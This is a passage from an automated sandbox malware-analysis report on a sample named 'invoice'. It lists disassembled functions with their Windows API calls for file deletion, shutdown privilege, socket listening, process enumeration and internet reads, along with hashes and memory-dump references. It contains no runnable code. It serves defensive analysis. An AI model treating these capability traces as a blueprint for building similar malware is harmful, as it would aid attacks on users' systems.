                        • Instruction Fuzzy Hash: 3721B4356002159FD721AF60DC49B7E77A8EF48710F148016F986DB261DB79AC00FB54
                        Function 00FE3833 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F848A1,?,?,00F837C0,?), ref: 00F848CE
                          • Part of subcall function 00FE4AD8: GetFileAttributesW.KERNEL32(?,00FE374F), ref: 00FE4AD9
                        • FindFirstFileW.KERNEL32(?,?), ref: 00FE38E7
                        • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00FE398F
                        • MoveFileW.KERNEL32(?,?), ref: 00FE39A2
                        • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00FE39BF
                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00FE39E1
                        • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00FE39FD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                        • String ID: \*.*
                        • API String ID: 4002782344-1173974218
                        • Opcode ID: 6ab73ab4168d118d9f7145c306e7751ed19979b67d070e7eb16a806bcc97af27
                        • Instruction ID: 20bece8617539ace59c061ef53fe28b28a9193f3a6c75171bdba7f59170ef399
                        • Opcode Fuzzy Hash: 6ab73ab4168d118d9f7145c306e7751ed19979b67d070e7eb16a806bcc97af27
                        • Instruction Fuzzy Hash: 8751B13180124D9BCF15FBA1CD9A9EDB7B9AF14700F644169E44277092EF39AF09EB60
                        Function 00FEF47F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F87F41: _memmove.LIBCMT ref: 00F87F82
                        • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00FEF4CC
                        • Sleep.KERNEL32(0000000A), ref: 00FEF4FC
                        • _wcscmp.LIBCMT ref: 00FEF510
                        • _wcscmp.LIBCMT ref: 00FEF52B
                        • FindNextFileW.KERNEL32(?,?), ref: 00FEF5C9
                        • FindClose.KERNEL32(00000000), ref: 00FEF5DF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                        • String ID: *.*
                        • API String ID: 713712311-438819550
                        • Opcode ID: 1ffa0b53e84d1fd5d89de2e7245feee4163fbf940096ef1398caf55a6033aea6
                        • Instruction ID: 25db6cc051c02b728f1778f6fcf159c4ca797880334cde6caac2addb215bb092
                        • Opcode Fuzzy Hash: 1ffa0b53e84d1fd5d89de2e7245feee4163fbf940096ef1398caf55a6033aea6
                        • Instruction Fuzzy Hash: 8F41927180024AABCF21EFA5CC45AEE7BB4FF15320F184566F815A7291DB359E48EF90
                        Function 00F94140 Relevance: 11.6, APIs: 1, Strings: 5, Instructions: 1132COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID:
                        • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                        • API String ID: 0-1546025612
                        • Opcode ID: 39dfedf9f50ba07dc3c7f9e69919a5b988ff06d59218d80503464390df9f3673
                        • Instruction ID: 5b64eab5ea815105208c2bb3d60696e3e9c003205620004f0eaafe196463f59a
                        • Opcode Fuzzy Hash: 39dfedf9f50ba07dc3c7f9e69919a5b988ff06d59218d80503464390df9f3673
                        • Instruction Fuzzy Hash: 91A2A271E0421ACBEF24DF58C941FADB7B1BF64324F2481A9D856A7280D734AD86EF50
                        Function 00F958C0 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: _memmove
                        • String ID:
                        • API String ID: 4104443479-0
                        • Opcode ID: ab5cede2bc8b69efe0d8c2b3c1388b6715abcd2e4055b797251eb1e9af291457
                        • Instruction ID: 44c0f5c010953602cc44aecf684b6891d21ade80002995f10d327471005076af
                        • Opcode Fuzzy Hash: ab5cede2bc8b69efe0d8c2b3c1388b6715abcd2e4055b797251eb1e9af291457
                        • Instruction Fuzzy Hash: B912AB70A00609EFEF14DFA5D981AEEB7F6FF48700F14452AE406A7251EB39AD11EB50
                        Function 00FE3B56 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F848A1,?,?,00F837C0,?), ref: 00F848CE
                          • Part of subcall function 00FE4AD8: GetFileAttributesW.KERNEL32(?,00FE374F), ref: 00FE4AD9
                        • FindFirstFileW.KERNEL32(?,?), ref: 00FE3BCD
                        • DeleteFileW.KERNEL32(?,?,?,?), ref: 00FE3C1D
                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00FE3C2E
                        • FindClose.KERNEL32(00000000), ref: 00FE3C45
                        • FindClose.KERNEL32(00000000), ref: 00FE3C4E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                        • String ID: \*.*
                        • API String ID: 2649000838-1173974218
                        • Opcode ID: 33eec26723ac6aefde8fc8e3ab4665bd1a4b46a041ff6a4e01e50566428967a6
                        • Instruction ID: 247b146a19b5858d94951c9afe489d61ac6f583f9c42c43a4b37152ae49ce2dc
                        • Opcode Fuzzy Hash: 33eec26723ac6aefde8fc8e3ab4665bd1a4b46a041ff6a4e01e50566428967a6
                        • Instruction Fuzzy Hash: 8C31AB31008385ABC315FB24CC999EFB7E8BE95714F444E1DF4D193191EB29EA09EB62
                        Function 00FE5264 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00FD8AA3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00FD8AED
                          • Part of subcall function 00FD8AA3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00FD8B1A
                          • Part of subcall function 00FD8AA3: GetLastError.KERNEL32 ref: 00FD8B27
                        • ExitWindowsEx.USER32(?,00000000), ref: 00FE52A0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                        • String ID: $@$SeShutdownPrivilege
                        • API String ID: 2234035333-194228
                        • Opcode ID: 09c91c4a42c4ab53516f2947a7d81b887b2c77011010c003ee0c8de733e6d20a
                        • Instruction ID: ce0c6938905990853691c8e7bdb70f01a5ea3aa84323beed6c155f7346fab12d
                        • Opcode Fuzzy Hash: 09c91c4a42c4ab53516f2947a7d81b887b2c77011010c003ee0c8de733e6d20a
                        • Instruction Fuzzy Hash: 6A017B31A906826BE738667A9C4BBBA7358EB05F95F240125FF43D20C2D9555C00B2A0
                        Function 00FF6399 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                        Download Yara Rule
                        APIs
                        • socket.WSOCK32(00000002,00000001,00000006), ref: 00FF63F2
                        • WSAGetLastError.WSOCK32(00000000), ref: 00FF6401
                        • bind.WSOCK32(00000000,?,00000010), ref: 00FF641D
                        • listen.WSOCK32(00000000,00000005), ref: 00FF642C
                        • WSAGetLastError.WSOCK32(00000000), ref: 00FF6446
                        • closesocket.WSOCK32(00000000), ref: 00FF645A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ErrorLast$bindclosesocketlistensocket
                        • String ID:
                        • API String ID: 1279440585-0
                        • Opcode ID: ae87361f86f49d3fc8c76dd7432785f7dda23a7a39e77b42911904d4b5585fad
                        • Instruction ID: ebfd0ee1be78ca834be625d13a0e4d7f620f8c83ae535cb24012fb93f00bfb80
                        • Opcode Fuzzy Hash: ae87361f86f49d3fc8c76dd7432785f7dda23a7a39e77b42911904d4b5585fad
                        • Instruction Fuzzy Hash: E721EE306002099FCB20FF64CC89B7EB3A9EF44320F148159EA5AE7391CB78AD00EB51
                        Function 00F95680 Relevance: 8.0, APIs: 5, Instructions: 516COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00FA0F36: std::exception::exception.LIBCMT ref: 00FA0F6C
                          • Part of subcall function 00FA0F36: __CxxThrowException@8.LIBCMT ref: 00FA0F81
                        • _memmove.LIBCMT ref: 00FD05AE
                        • _memmove.LIBCMT ref: 00FD06C3
                        • _memmove.LIBCMT ref: 00FD076A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: _memmove$Exception@8Throwstd::exception::exception
                        • String ID:
                        • API String ID: 1300846289-0
                        • Opcode ID: 9cc600a225143c47ddd23cd6e1ac423117d22da17e42b17fc8028e252790d803
                        • Instruction ID: e55f8a21575723b3c122b08040a8db8ce951ffbb8cd564d3e75fa8bf434b87d8
                        • Opcode Fuzzy Hash: 9cc600a225143c47ddd23cd6e1ac423117d22da17e42b17fc8028e252790d803
                        • Instruction Fuzzy Hash: 1902BFB1E00209DFDF14DF64D981AAE7BB5EF44310F18806AE806EB355EB35DA11EB91
                        Function 00F81287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F82612: GetWindowLongW.USER32(?,000000EB), ref: 00F82623
                        • DefDlgProcW.USER32(?,?,?,?,?), ref: 00F819FA
                        • GetSysColor.USER32(0000000F), ref: 00F81A4E
                        • SetBkColor.GDI32(?,00000000), ref: 00F81A61
                          • Part of subcall function 00F81290: DefDlgProcW.USER32(?,00000020,?), ref: 00F812D8
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ColorProc$LongWindow
                        • String ID:
                        • API String ID: 3744519093-0
                        • Opcode ID: 4e0d33399fde1e75ccef953ad3190a3eb9cf41a97dc7f855d94886d2d5d7e766
                        • Instruction ID: 6438a043fb775315377a3fff5f0dc653f8e6d93d796766461dc1f0d1b6fe6ff5
                        • Opcode Fuzzy Hash: 4e0d33399fde1e75ccef953ad3190a3eb9cf41a97dc7f855d94886d2d5d7e766
                        • Instruction Fuzzy Hash: 16A114B2501546FBEA3CBA29DC88EFB359DFB81361F14031AF442D2185DA6D9D02B771
                        Function 00FF685D Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00FF7EA0: inet_addr.WSOCK32(00000000), ref: 00FF7ECB
                        • socket.WSOCK32(00000002,00000002,00000011), ref: 00FF68B4
                        • WSAGetLastError.WSOCK32(00000000), ref: 00FF68DD
                        • bind.WSOCK32(00000000,?,00000010), ref: 00FF6916
                        • WSAGetLastError.WSOCK32(00000000), ref: 00FF6923
                        • closesocket.WSOCK32(00000000), ref: 00FF6937
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ErrorLast$bindclosesocketinet_addrsocket
                        • String ID:
                        • API String ID: 99427753-0
                        • Opcode ID: 6186e555db0b3896e30593a44b9dd8e2edf0640b4556ec7750de7baf378d2558
                        • Instruction ID: a95c839aa47d02679bc84d362f3d63a845de59dcb2eca9c883ef1cc8f90c87a6
                        • Opcode Fuzzy Hash: 6186e555db0b3896e30593a44b9dd8e2edf0640b4556ec7750de7baf378d2558
                        • Instruction Fuzzy Hash: 0941E831A00214AFDB20BF64DC86FBE77A5DF44710F44805CFA4AAB3D2DA785D01A791
                        Function 010053DF Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                        • String ID:
                        • API String ID: 292994002-0
                        • Opcode ID: fb6b1d07d079047dbdd44f6610ebc8affbbac864c7c6c681b6fea33aa2cd2aac
                        • Instruction ID: 2f6e3145c091869939f0125d211caffd47b03e21661dcb461c87f8bb71b4bdad
                        • Opcode Fuzzy Hash: fb6b1d07d079047dbdd44f6610ebc8affbbac864c7c6c681b6fea33aa2cd2aac
                        • Instruction Fuzzy Hash: 5511E2317001116BF7326F2ADC44BAE7B99FF48726F064028F986C7281CF7999029B95
                        Function 00FFC104 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                        Download Yara Rule
                        APIs
                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00FC1CB7,?), ref: 00FFC112
                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00FFC124
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID: GetSystemWow64DirectoryW$kernel32.dll
                        • API String ID: 2574300362-1816364905
                        • Opcode ID: c926743d492ad1aeeea27cad26ee9f3aaa75629111c93edbbe3c12c8e325b35d
                        • Instruction ID: 9dffbc26789600307be117e222c1a2a07f390c258d9643ced7e4c3faebedeb39
                        • Opcode Fuzzy Hash: c926743d492ad1aeeea27cad26ee9f3aaa75629111c93edbbe3c12c8e325b35d
                        • Instruction Fuzzy Hash: 36E0867450072B8FD7315B26C418A9176D4EF09354F408429D4C5D2110D7F8C840DBA0
                        Function 00F93190 Relevance: 6.6, APIs: 4, Instructions: 587COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: __itow__swprintf
                        • String ID:
                        • API String ID: 674341424-0
                        • Opcode ID: 3efa6a3f5b4b7e67734b9c5ec76473343b77843c04e1f82356187e35ccffca36
                        • Instruction ID: c127d9b42756a0741ffbdfd1cabddb7e9e0fe1125be51646bc23f968c80486c0
                        • Opcode Fuzzy Hash: 3efa6a3f5b4b7e67734b9c5ec76473343b77843c04e1f82356187e35ccffca36
                        • Instruction Fuzzy Hash: 2D229F715083029FDB24EF24C881BAFB7E4BF84714F18491DF49697291DB75EA04EB92
                        Function 00FFEF21 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                        Download Yara Rule
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00FFEF51
                        • Process32FirstW.KERNEL32(00000000,?), ref: 00FFEF5F
                          • Part of subcall function 00F87F41: _memmove.LIBCMT ref: 00F87F82
                        • Process32NextW.KERNEL32(00000000,?), ref: 00FFF01F
                        • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00FFF02E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                        • String ID:
                        • API String ID: 2576544623-0
                        • Opcode ID: b02087dc078ee417d2c42e5f26ae29f67b9a36fbbcdcf0aad3f8f49a40d4e024
                        • Instruction ID: 43d1c5acd2a2e7323752c6e6e1018e606b172c82ea10d804a6e97f805de343da
                        • Opcode Fuzzy Hash: b02087dc078ee417d2c42e5f26ae29f67b9a36fbbcdcf0aad3f8f49a40d4e024
                        • Instruction Fuzzy Hash: D1517F715083119FD320EF20DC85EABB7E8AF94B10F54482DF596972A1EB74D908DB92
                        Function 00FDE928 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                        Download Yara Rule
                        APIs
                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00FDE93A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: lstrlen
                        • String ID: ($|
                        • API String ID: 1659193697-1631851259
                        • Opcode ID: 2d705bffaa61f84058b3173effeb2a8c959f560a9748ff167eac43a41adba94f
                        • Instruction ID: ec6e0b6535a30a42b57b247267dd75abc085c08d84e6d5e2d8346f880ca763b7
                        • Opcode Fuzzy Hash: 2d705bffaa61f84058b3173effeb2a8c959f560a9748ff167eac43a41adba94f
                        • Instruction Fuzzy Hash: 9D321575A006059FC728DF19C481A6AB7F2FF48720B15C56EE89ADB3A1EB70E941DB40
                        Function 00FF2404 Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                        Download Yara Rule
                        APIs
                        • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00FF1920,00000000), ref: 00FF24F7
                        • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00FF252E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Internet$AvailableDataFileQueryRead
                        • String ID:
                        • API String ID: 599397726-0
                        • Opcode ID: 258d907a0f75aa16e7ab8341eadc0b4a5e1f45ccaa3b78c61d1bec7ba5100c79
                        • Instruction ID: 10476a93b67371ed9da59c814bd8d2f137ed6112b0b6ea49337e274a8bb73eb1
                        • Opcode Fuzzy Hash: 258d907a0f75aa16e7ab8341eadc0b4a5e1f45ccaa3b78c61d1bec7ba5100c79
                        • Instruction Fuzzy Hash: 3841F3B290020DBFEB60DE94DC85FBBB7ACEF40724F14406AF701A6161DBB49E40A660
                        Function 00FEB3BF Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                        Download Yara Rule
                        APIs
                        • SetErrorMode.KERNEL32(00000001), ref: 00FEB3CF
                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00FEB429
                        • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00FEB476
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
